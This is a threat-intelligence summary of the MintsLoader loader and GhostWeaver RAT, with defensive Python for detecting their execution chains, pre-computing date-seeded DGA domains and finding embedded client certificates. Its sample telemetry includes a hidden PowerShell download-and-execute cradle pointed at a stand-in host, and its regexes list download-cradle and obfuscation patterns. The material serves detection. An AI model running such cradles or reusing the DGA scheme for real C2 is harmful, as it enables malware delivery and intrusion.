Full Report
The malware loader known as MintsLoader has been used to deliver a PowerShell-based remote access trojan called GhostWeaver. "MintsLoader operates through a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts," Recorded Future's Insikt Group said in a report shared with The Hacker News. "The malware employs sandbox and virtual machine evasion techniques, a domain
Analysis Summary
# Tool/Technique: MintsLoader
## Overview
MintsLoader is a malware loader that operates through a multi-stage infection chain, utilizing obfuscated JavaScript and PowerShell scripts to deliver secondary payloads, notably the GhostWeaver remote access trojan (RAT). It is often distributed via phishing campaigns and employs evasion techniques to hinder analysis.
## Technical Details
- Type: Malware Loader
- Platform: Windows (implied by reliance on JavaScript and PowerShell)
- Capabilities: Multi-stage infection, sandbox/VM evasion, Domain Generation Algorithm (DGA) for C2 resolution, HTTP-based C2 for subsequent payload delivery.
- First Seen: Early 2023
## MITRE ATT&CK Mapping
(Note: Specific mappings are inferred based on described loader behavior, as the article does not provide explicit mappings.)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1547 - Boot or Logon Autostart Execution
- T1027 - Obfuscated Files or Information
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP C2)
## Functionality
### Core Capabilities
- **Multi-Stage Delivery:** Executes through obfuscated JavaScript and PowerShell scripts in a multi-stage process.
- **Payload Dropper:** Primary function is to download and execute the next-stage payload (e.g., GhostWeaver, StealC, modified BOINC client) from a DGA-generated domain.
- **Evasion:** Employs techniques to evade detection by sandboxes and virtual machines.
- **Social Engineering:** Recently used in conjunction with the **ClickFix** social engineering trick, where victims are persuaded to copy and execute malicious code.
### Advanced Features
- **Domain Generation Algorithm (DGA):** Implements a DGA mechanism where the Command and Control (C2) domain is derived based on the current calendar day, complicating C2 tracking.
- **Obfuscation:** Utilizes heavy obfuscation within its scripts to complicate static and dynamic analysis.
## Indicators of Compromise
*Note: Specific file hashes, exact registry keys, and precise network indicators were not provided in the summary text.*
- File Hashes: [Not specified]
- File Names: [Inferred to be JS/PowerShell scripts]
- Registry Keys: [Not specified]
- Network Indicators: C2 domains generated daily via DGA and contacted over HTTP; the generation algorithm itself is not published in the source, so no static domain list can be given.
- Behavioral Indicators: Execution chains involving JavaScript leading to obfuscated PowerShell; attempts to communicate over HTTP to dynamically determined domains.
## Associated Threat Actors
- Threat actors utilizing e-crime services such as **SocGholish** (aka FakeUpdates) and **LandUpdate808** (aka TAG-124).
## Detection Methods
- [Signature-based detection]: Signatures against known MintsLoader script patterns or secondary payloads.
- [Behavioral detection]: Monitoring for multi-stage execution chains starting with JavaScript/PowerShell leading to suspicious network connections (especially DGA resolution). Monitoring for sandbox/VM evasion attempts.
- [YARA rules if available]: None are provided in the source; rules would target the loader's recurring script structure or its obfuscation patterns rather than any single hash.
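The behavioral detection above, as an added example that is not part of the source report: a small classifier over process-creation telemetry that flags the two chain shapes described on this page, a JavaScript stage run by `wscript.exe`/`cscript.exe` that spawns PowerShell, and a ClickFix-style PowerShell one-liner launched from `explorer.exe` (the Run dialog), plus a generic score for obfuscated PowerShell command lines. The event field names and the sample events are constructed to resemble Sysmon Event ID 1 records; the signal list and threshold are assumptions to tune, not published indicators.

```python
"""Behavioral detection for MintsLoader-style execution chains.

Added example (not from the Recorded Future report or The Hacker News
article). Event fields and sample events are constructed to look like
Sysmon Event ID 1 / EDR process-creation records.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line features typical of obfuscated PowerShell stagers. Each match
# contributes one signal; ALERT_THRESHOLD decides when signals alone alert.
OBFUSCATION_SIGNALS = {
    "encoded_command": re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window":   re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "no_profile":      re.compile(r"(?i)-no(p|profile)\b"),
    "bypass_policy":   re.compile(r"(?i)-e(p|x|xecutionpolicy)\s+bypass"),
    "download_cradle": re.compile(r"(?i)(\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b|net\.webclient)"),
    "base64_decode":   re.compile(r"(?i)frombase64string"),
    "char_assembly":   re.compile(r"(?i)\[char\]\s*\d+|-join\s*\(|\[string\]::join"),
}
ALERT_THRESHOLD = 2


def score_command_line(cmdline):
    """Return the names of the obfuscation signals present in a command line."""
    return [name for name, rx in OBFUSCATION_SIGNALS.items() if rx.search(cmdline)]


def classify(event):
    """Classify one process-creation event.

    event: dict with keys host, image, parent_image, command_line.
    Returns (verdict, signals); verdict is 'script_host_to_powershell',
    'clickfix_shape', 'suspicious_powershell' or None.
    """
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if image not in SHELLS:
        return None, []
    signals = score_command_line(event["command_line"])
    # Stage 1 -> stage 2: the JScript dropper (wscript/cscript) spawning PowerShell.
    if parent in SCRIPT_HOSTS:
        return "script_host_to_powershell", signals
    # ClickFix: the user pastes a one-liner into the Run dialog, so the parent is
    # explorer.exe and the command line is normally a download cradle.
    if parent == "explorer.exe" and ("download_cradle" in signals or "encoded_command" in signals):
        return "clickfix_shape", signals
    if len(signals) >= ALERT_THRESHOLD:
        return "suspicious_powershell", signals
    return None, signals


def detect(events):
    """Run classify() over a list of events and return only the alerts."""
    alerts = []
    for ev in events:
        verdict, signals = classify(ev)
        if verdict:
            alerts.append({"host": ev["host"], "verdict": verdict,
                           "signals": signals, "command_line": ev["command_line"]})
    return alerts


# Constructed sample telemetry (not real indicators).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1"},
    {"host": "ws04", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["host"], alert["verdict"], alert["signals"])
```

The parent-process rules fire regardless of score because a script host or the Run dialog launching PowerShell is itself the anomaly; the score only matters for PowerShell started from an ordinary parent, where a single flag such as `-NoProfile` is routine in legitimate automation.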
## Mitigation Strategies
- [Prevention measures]: Employee training on identifying phishing lures and social engineering tactics like **ClickFix**. Email filtering to block known malicious domains/senders.
- [Hardening recommendations]: Restrict PowerShell and Windows Script Host execution via AppLocker or Windows Defender Application Control (WDAC); an enforced AppLocker/WDAC policy also places PowerShell in Constrained Language Mode, which breaks most obfuscated stagers. The PowerShell execution policy is not a security boundary (`-ExecutionPolicy Bypass` overrides it from the command line), so pair allow-listing with script block logging (Event ID 4104) and, for users who do not need them, block `wscript.exe`/`cscript.exe`, the hosts for the JavaScript first stage.
## Related Tools/Techniques
- **GhostWeaver:** The secondary payload often deployed by MintsLoader.
- **ClickFix:** A social engineering tactic used to trick users into running malicious code.
- **SocGholish/FakeUpdates & LandUpdate808:** Threat groups known to leverage MintsLoader.
- **StealC:** Another known secondary payload delivered by MintsLoader.
---
# Tool/Technique: GhostWeaver
## Overview
GhostWeaver is a PowerShell-based Remote Access Trojan (RAT) known to be deployed as a secondary payload by MintsLoader. Its primary function is to maintain persistent communication with C2 infrastructure, handle further payload delivery, and potentially steal browser data.
## Technical Details
- Type: Remote Access Trojan (RAT) / Payload
- Platform: Windows (PowerShell-based)
- Capabilities: Persistent communication, DGA implementation, plugin system for extensibility, TLS secured C2 with client-side authentication, ability to redeploy MintsLoader.
- First Seen: Not stated in the source; GhostWeaver is documented in 2025 reporting (the February and May 2025 reports referenced in the article).
## MITRE ATT&CK Mapping
(Note: Specific mappings are inferred based on described RAT behavior.)
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/S C2)
- T1543.003 - Windows Service (inferred for persistence; the source does not describe how GhostWeaver persists, so this sub-technique is speculative and should be verified against samples)
- T1219 - Remote Access Software
- T1105 - Ingress Tool Transfer
## Functionality
### Core Capabilities
- **C2 Communication:** Maintains persistent communication with its C2 server.
- **DGA Functionality:** Generates DGA domains based on a fixed-seed algorithm tied to the week number and year.
- **Payload Delivery (Plugins):** Can deliver additional payloads in the form of plugins.
### Advanced Features
- **Encrypted C2:** Communications are secured via **TLS encryption**.
- **Client-Side Authentication:** Uses an obfuscated, self-signed X.509 certificate embedded directly within the PowerShell script for client-side authentication to the C2 infrastructure.
- **MintsLoader Redeployment:** Possesses a `sendPlugin` command allowing it to deploy MintsLoader as an additional payload, potentially for redundancy or chain diversification.
- **Data Exfiltration/Manipulation:** Plugins are capable of stealing browser data and manipulating HTML content.
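The two DGAs on this page, MintsLoader's (seeded by the current day) and GhostWeaver's (seeded by week number and year with a fixed seed), differ only in how the date is collapsed into a seed, and that difference decides how far ahead a defender can pre-compute blocklists. The following is an added illustration, not either family's real algorithm: the source gives the inputs but not the derivation, so the hashing scheme, the seed value, the label length, the `.invalid` TLD and the three-domains-per-period count are all assumptions. It serves both the MintsLoader DGA described under Advanced Features above and GhostWeaver's.

```python
"""Pre-computing a date-seeded DGA for blocking and hunting.

Added example; not the MintsLoader or GhostWeaver algorithm. Seed, hash,
label length, TLD and domain count are assumptions made to show the mechanics.
"""
import base64
import datetime as dt
import hashlib


def as_date(d):
    """Accept a datetime.date or an ISO 'YYYY-MM-DD' string."""
    return d if isinstance(d, dt.date) else dt.date.fromisoformat(d)


def period_key(day, period):
    """Collapse a date into the value the generator is seeded with."""
    day = as_date(day)
    if period == "day":                      # MintsLoader-style: changes every day
        return f"{day.year}-{day.timetuple().tm_yday}"
    if period == "week":                     # GhostWeaver-style: week number and year
        iso_year, iso_week, _ = day.isocalendar()
        return f"{iso_year}-W{iso_week}"
    raise ValueError(period)


def dga_domains(day, period, seed="example-seed", count=3, tld=".invalid"):
    """Generate `count` candidate C2 domains for the period containing `day`.

    Deterministic: the same seed and period key always yield the same names,
    which is exactly what lets a defender pre-compute them.
    """
    key = period_key(day, period)
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{key}|{i}".encode()).digest()
        label = base64.b32encode(digest[:10]).decode().lower().rstrip("=")   # 16 chars
        domains.append(label + tld)
    return domains


def blocklist_window(start, days, period, **kw):
    """Union of every domain the generator can produce in [start, start+days)."""
    start = as_date(start)
    out = set()
    for offset in range(days):
        out.update(dga_domains(start + dt.timedelta(days=offset), period, **kw))
    return out


def matches_dga(qname, day, period, slack_days=1, **kw):
    """Hunting check: is a queried name in the DGA output for `day` or its
    neighbours? The slack absorbs clock skew between the host and the sensor."""
    day = as_date(day)
    for offset in range(-slack_days, slack_days + 1):
        if qname.lower() in dga_domains(day + dt.timedelta(days=offset), period, **kw):
            return True
    return False


if __name__ == "__main__":
    today = "2025-05-01"   # fixed date so the output is reproducible
    print("day-seeded  :", dga_domains(today, "day"))
    print("week-seeded :", dga_domains(today, "week"))
    print("30-day blocklist: day=%d names, week=%d names" % (
        len(blocklist_window(today, 30, "day")), len(blocklist_window(today, 30, "week"))))
```

Once a sample has been reversed and the real derivation substituted into `dga_domains`, `blocklist_window` gives the sinkhole/blocklist for any horizon, and `matches_dga` can be run over DNS logs; the week-seeded variant yields far fewer names per month, so it is cheaper to block but also gives the operator a full week of stable infrastructure per rotation.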
## Indicators of Compromise
*Note: Specific file hashes/names relevant to GhostWeaver payloads are not provided.*
- File Hashes: [Not specified]
- File Names: [PowerShell script structure embedded in memory/disk]
- Registry Keys: [Not specified]
- Network Indicators: C2 servers leveraging TLS secured channels authenticated via embedded, self-signed X.509 certificates.
- Behavioral Indicators: Outbound TLS connections from PowerShell that present a self-signed or otherwise non-standard client certificate; unusual PowerShell behavior related to loading plugins or re-launching the loader.
## Associated Threat Actors
- Shared dependency with threat actors deploying **MintsLoader**.
## Detection Methods
- [Signature-based detection]: Detecting the specific embedded self-signed X.509 certificate used for C2 authentication.
- [Behavioral detection]: Monitoring for `powershell.exe` establishing outbound TLS sessions to non-corporate destinations, and for script block logs (Event ID 4104) containing a large base64 blob handed to `X509Certificate2` or a client-certificate handler. Note that TLS 1.3 encrypts the client certificate inside the handshake, so the embedded certificate is only observable on the wire for TLS 1.2 sessions; endpoint telemetry is the reliable source. Detection of DGA lookups tied to weekly cycles (a fresh set of failed or first-seen lookups appearing each week).
- [YARA rules if available]: Rules targeting the specific PowerShell structure or embedded certificate data.
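The signature and YARA suggestions above both reduce to one question: does a script carry certificate material? The following added scanner (my example, not Recorded Future's detection logic) answers it without knowing the certificate in advance. A client certificate embedded in PowerShell has to be materialised somehow, usually as a base64 string fed to `X509Certificate2` or `[Convert]::FromBase64String`, so the scanner decodes every long base64 run in a script body (for instance from Event ID 4104) and checks whether the bytes have the DER shape of an X.509 v3 certificate or a PKCS#12 (PFX) container. The sample script and its blob are constructed; the blob has a valid outer structure and dummy inner bytes, so it is not a usable certificate.

```python
"""Hunting for X.509 certificates embedded in PowerShell scripts.

Added example, not the report's detection logic. The sample script and
its certificate blob are constructed, not real malware.
"""
import base64
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
CERT_API = re.compile(r"(?i)X509Certificate2|FromBase64String|Import-PfxCertificate|ClientCertificates")


def der_length(buf, pos):
    """Decode a DER length at buf[pos]; return (length, bytes consumed) or None."""
    if pos >= len(buf):
        return None
    first = buf[pos]
    if first < 0x80:                      # short form
        return first, 1
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4 or pos + 1 + n > len(buf):
        return None
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), 1 + n


def classify_der(blob):
    """Return 'x509', 'pkcs12' or None for a decoded blob.

    X.509 v3: SEQUENCE { SEQUENCE tbsCertificate { [0] EXPLICIT INTEGER 2 ... } ... }
    PKCS#12 : SEQUENCE { INTEGER 3, SEQUENCE authSafe ... }
    """
    if len(blob) < 8 or blob[0] != 0x30:
        return None
    outer = der_length(blob, 1)
    if outer is None:
        return None
    outer_len, consumed = outer
    if outer_len + 1 + consumed != len(blob):   # DER is exact: no trailing bytes
        return None
    body = blob[1 + consumed:]
    if body[:3] == b"\x02\x01\x03" and body[3:4] == b"\x30":
        return "pkcs12"
    if body[:1] == b"\x30":
        inner = der_length(body, 1)
        if inner is not None:
            tbs = body[1 + inner[1]:]
            if tbs[:5] == b"\xa0\x03\x02\x01\x02":   # version [0] EXPLICIT INTEGER 2 (v3)
                return "x509"
    return None


def scan_script(text):
    """Find embedded certificate material in a PowerShell script body."""
    findings = []
    for m in B64_RUN.finditer(text):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except ValueError:                # binascii.Error is a ValueError
            continue
        kind = classify_der(blob)
        if kind:
            findings.append({"kind": kind, "offset": m.start(), "der_len": len(blob),
                             "uses_cert_api": bool(CERT_API.search(text))})
    return findings


def build_fake_cert_der(payload_len=300):
    """Construct a blob with a valid X.509 v3 outer structure and dummy inner bytes."""
    tbs_body = b"\xa0\x03\x02\x01\x02" + b"\x00" * payload_len
    tbs = b"\x30\x82" + len(tbs_body).to_bytes(2, "big") + tbs_body
    return b"\x30\x82" + len(tbs).to_bytes(2, "big") + tbs


# Constructed sample: the shape a script takes when it loads an embedded client cert.
SAMPLE_SCRIPT = (
    "$raw = '" + base64.b64encode(build_fake_cert_der()).decode() + "'\n"
    "$cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new("
    "[Convert]::FromBase64String($raw))\n"
    "$h = [System.Net.Http.HttpClientHandler]::new(); $h.ClientCertificates.Add($cert)\n"
)

if __name__ == "__main__":
    for finding in scan_script(SAMPLE_SCRIPT):
        print(finding)
```

The structural check deliberately stops short of parsing the certificate: once a hit is confirmed, hand the decoded bytes to `openssl x509 -inform der -noout -text` (or `openssl pkcs12 -info` for a PFX) to read the subject, issuer and validity and to confirm it is self-signed. Scripts that obfuscate the blob further (split strings, reversed base64, XOR) will not match this regex and need a deobfuscation pass first.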
## Mitigation Strategies
- [Prevention measures]: Strict network egress filtering (PowerShell on a workstation rarely has a legitimate reason to reach arbitrary Internet hosts); TLS inspection at the proxy to flag sessions negotiated with self-signed or otherwise unusual certificates. Passive inspection can only see the client certificate in TLS 1.2 handshakes, because TLS 1.3 encrypts it, so do not rely on certificate matching alone to find this traffic.
- [Hardening recommendations]: Application whitelisting to prevent unrestricted PowerShell execution.
## Related Tools/Techniques
- **MintsLoader:** The primary loader for GhostWeaver.
- **DGA:** Used for resilient C2 domain resolution.